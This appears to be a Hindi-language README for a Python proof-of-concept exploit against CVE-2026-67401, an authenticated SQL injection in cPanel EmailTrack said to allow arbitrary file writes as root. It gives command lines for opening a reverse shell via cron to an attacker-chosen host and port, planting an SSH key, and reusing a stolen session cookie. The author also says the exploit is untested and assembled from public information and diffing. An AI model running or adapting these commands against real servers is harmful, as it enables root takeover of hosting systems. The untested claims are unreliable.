
CVE-2026-67401 के लिए Python प्रूफ-ऑफ-कॉन्सेप्ट, cPanel EmailTrack में एक प्रमाणित SQL इंजेक्शन जो SQLite ATTACH DATABASE के माध्यम से रूट के रूप में मनमाना फ़ाइल लेखन की अनुमति देता है, जिससे रिवर्स शेल या SSH कुंजी ड्रॉप संभव हो जाता है।
cPanel EmailTrack में SQL इंजेक्शन। मेल विशेषाधिकारों वाला प्रमाणित cPanel उपयोगकर्ता SQLite ATTACH DATABASE के माध्यम से रूट के रूप में मनमानी फ़ाइलें लिखता है। रूट तक पहुँचने के लिए एक अनुरोध। वास्तविक लक्ष्य पर परीक्षण नहीं किया गया है, कोड केवल सार्वजनिक जानकारी और बुनियादी diff'ing से एक साथ रखा गया है। एक शोधकर्ता के रूप में अपना उचित परिश्रम करें और इसे आज़माएँ और PR फिक्स भेजें।
Sep 8 2026 पैच से पहले के सभी cPanel/WHM बिल्ड को प्रभावित करता है।
requests लाइब्रेरी# क्रॉन के माध्यम से रिवर्स शेल
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443
# SSH कुंजी ड्रॉप
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub
# मौजूदा सत्र
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1
# ड्राई रन (अनुरोध प्रिंट करें, भेजें नहीं)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1